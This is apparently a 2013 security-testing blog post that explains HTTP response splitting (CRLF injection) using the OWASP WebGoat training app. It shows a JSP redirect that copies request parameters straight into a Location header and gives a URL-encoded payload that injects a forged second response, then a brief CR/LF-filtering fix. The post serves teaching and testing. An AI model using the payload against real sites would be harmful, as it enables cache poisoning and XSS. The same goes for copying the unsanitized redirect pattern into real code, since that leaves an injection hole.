HTTP Response Splitting

As the name suggests its basic attack techniques from which user can parse malicious datas (Which include encoded request) and application serves the request in the form of responding to it by  one additional response header.

This  attack technique is also popular by CRLF(Carriage return/Line feed) Attack as it uses CR(%0d) and Line feed(%0a) to get carried out.

Explanation using  OWASP WebGoat Project: –

Lets say we have a search section in our app: –

search form

 

Consider we have this following JSP page which redirects the requests  with some POST parameters to the server : –

<% response.sendRedirect(request.getContextPath() + “/attack?” +

“Screen=” + request.getParameter(“Screen”) +

“&menu=” + request.getParameter(“menu”) +

“&fromRedirect=yes&language=” + request.getParameter(“language”));

%>

-Lets say we posted a test data say : – “test”

posttest

Observation : –

It uses GET request to show send the datas.

In this case it serves the request by sending one response header: –

Content-Length 0
Content-Type text/html;charset=ISO-8859-1
Date Fri, 16 Aug 2013 10:06:13 GMT
Location http://localhost:8080/WebGoat/attack?Screen=79&menu=100&fromRedirect=yes&language=test
Server Apache-Coyote/1.1

Sending Malicious Datas : –

Malicious datas can be sent by introducing CR and LF chars and include one request header in encoded format.

Lets say we want to send : –

en

COntent-Length:0

HTTP/1.1 200 OK

Content-Type:text/html

Content-Length:50

<html>Security Tester Entry</html>

Encoding : –

URL encoded format  : –

Tools Used : – cal9000

resultstext

Sample url encoded data : –

en%0aCOntent-Length:0%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:text/html%0aContent-Length:50%0a%3chtml%3eSecurity%20Tester%20ENtry%3c/html%3e

Replace the “%0a” with “%0d%0a” which indirectly suggests  start from the beginning character of the next new line.

Updated encoded data : –

en%0d%0aContent-Length:0%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0aContent-Length:50%0d%0a%3chtml%3eSecurity%20Tester%20ENtry%3c/html%3e

-hit search and notice , it will detect the attack.

noticeattack

Note:

HTTP response splitting can cause Web Cache poisoning and various other attacks like XSS.

Solutions : –

All the GET/POST parameters should be filtered for CR and LF chars before responding from the server side.

Written By: Krushna Prasad Subudhi, QA Engineer, Mindfire Solutions

Advertisements

Posted on August 21, 2013, in Manual Testing, Web Security Testing and tagged , , , , , , , , , . Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: